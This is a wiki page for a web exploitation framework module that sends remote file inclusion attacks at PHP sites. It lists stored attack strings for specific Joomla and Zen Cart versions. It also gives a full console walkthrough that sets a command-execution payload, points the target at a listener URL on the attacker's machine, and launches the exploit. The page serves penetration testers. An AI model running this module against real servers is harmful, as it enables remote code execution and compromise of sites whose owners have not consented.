Skip to content

exploit rfi php all php rfi

cktricky edited this page Jul 26, 2011 · 5 revisions

Author(s):

Ken Johnson (CKTRICKY)

Description:

Allows you to pull RFI attack strings out of the database. You can choose an RFI string and send off the request.

Module Options:

COOKIE                                       true       Example: uniquecookie=cookievalue
PROXYA                                       false      Proxy IP Address
PROXYP                                       false      Proxy Port Number
RFI                                          true       Enter the RFI by name
RURL       http://www.example.com/test.php   true       Target address
THROTTLE   0                                 false      Specify a number, after x requests we pause

Options Explained (Module Specific):

COOKIES -- If you have a cookie or cookies that you'd like to add to the request (whether GET or POST, doesn't matter), go ahead and set them here like so:

SINGLE COOKIE

set COOKIES ASPSESSIONID=1234;

MULTI COOKIE

set COOKIES ASPSESSIONID=1234; ASP.NET_SessionId=5678;

RFI -- Name of the RFI you'd like to use.

wXf exploit(all_php_rfi)//> show rfi 

RFI List
========

Name        Description                                           Platform   Language
----        -----------                                           --------   --------
joomla_1    Joomla 1.5.0 Beta Release                             joomla     PHP
joomla_2    Joomla 1.0.8                                          joomla     PHP
joomla_3    Joomla 1.0.11, 1.0.12, 1.0.13, 1.0.14                 joomla     PHP
zencart_1   Zen Cart Web Shopping Cart 1.2.7,  1.1.2 d, 1.3.0.2   zencart    PHP

wXf exploit(all_php_rfi)//> set RFI joomla_1

Real world example:

I'd like to exploit a vulnerable Joomla server (version 1.0.8). My IP is 192.168.1.120 and I'd like to listen on port 31337. The victim site is www.example.com.

wXf //> use exploit/rfi/php/all_php_rfi 
wXf exploit(all_php_rfi)//> set RFI joomla_2
-{+}- RFI => joomla_2
wXf exploit(all_php_rfi)//> set PAYLOAD payload/rfi/php/cmd_single 
-{+}-  PAYLOAD => payload/rfi/php/cmd_single
wXf exploit(all_php_rfi)//> set RURL http://www.example.com/joomla
-{+}- RURL => http://www.example.com/joomla
wXf exploit(all_php_rfi)//> set LURL http://192.168.1.120:31337
-{+}- LURL => http://192.168.1.120:31337
wXf exploit(all_php_rfi)//> exploit 
Clone this wiki locally